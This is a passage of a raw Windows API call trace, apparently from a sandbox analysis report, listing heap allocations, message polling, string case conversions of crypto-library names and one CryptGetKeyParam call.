HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0043.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0043.758] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0043.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0043.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0043.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0043.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0043.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0043.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0043.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0043.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0043.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0043.758] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0043.758] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0043.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0043.758] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0043.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0043.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2d8 [0043.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0043.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0043.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0043.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0043.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ce20 [0043.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0043.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0043.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0043.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0043.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0043.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0043.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0043.759] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0043.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0043.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0043.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0043.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0043.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0043.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0043.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0043.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0043.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0043.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0043.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0043.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0043.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0043.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0043.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0043.759] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0043.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0043.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0043.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0043.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0043.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0043.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0043.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0043.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0043.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0043.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0043.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0043.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0043.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0043.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0043.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0043.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0043.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0043.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0043.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0043.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0043.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0043.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0043.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0043.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0043.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0043.760] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0043.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0043.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0043.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0043.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0043.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0043.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0043.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0043.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0043.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0043.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0043.761] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0043.761] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0043.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0043.761] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0043.761] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0043.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0043.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0043.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0043.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0043.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0043.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0043.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0043.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0043.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0043.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0043.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0043.761] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0043.761] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0043.761] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0043.761] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0043.761] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0043.761] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0043.761] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0043.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0043.761] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0043.761] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0043.761] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0043.761] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0043.761] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0043.761] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0043.761] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c958 [0043.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0043.762] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0043.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0043.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0043.762] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0043.762] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0043.762] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0043.762] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0043.762] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0043.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0043.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0043.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0043.762] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0043.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0043.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0043.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0043.762] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0043.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0043.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0043.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0043.762] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0043.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0043.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0043.762] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0043.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0043.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0043.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0043.762] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0043.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0043.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0043.762] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0043.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0043.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0043.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0043.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0043.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0043.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0043.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0043.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0043.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0043.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0043.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0043.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0043.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0043.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0043.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0043.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0043.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0043.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0043.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0043.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0043.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0043.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0043.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0043.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0043.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0043.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0043.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0043.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0043.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0043.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0043.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0043.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0043.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0043.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0043.764] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0043.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0043.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0043.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0043.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0043.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0043.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0043.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0043.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0043.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0043.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0043.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0043.764] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0043.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0043.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0043.764] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0043.764] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0043.764] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0043.764] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0043.764] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0043.764] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0043.764] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0043.764] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0043.764] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0043.764] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0043.764] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0043.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0043.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0043.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0043.765] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0043.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0043.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0043.765] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0043.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0043.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0043.765] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0043.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0043.765] CryptGetKeyParam (in: hKey=0x7c2280, dwParam=0x7, pbData=0x7da398, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da398*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0043.765] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0043.765] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0043.765] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.765] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.765] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.765] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.765] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0043.765] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.765] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.765] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0043.765] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0043.765] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0043.765] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.765] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0043.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0043.766] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0043.766] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0043.766] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.766] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0043.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0043.766] PeekMessageW (in: 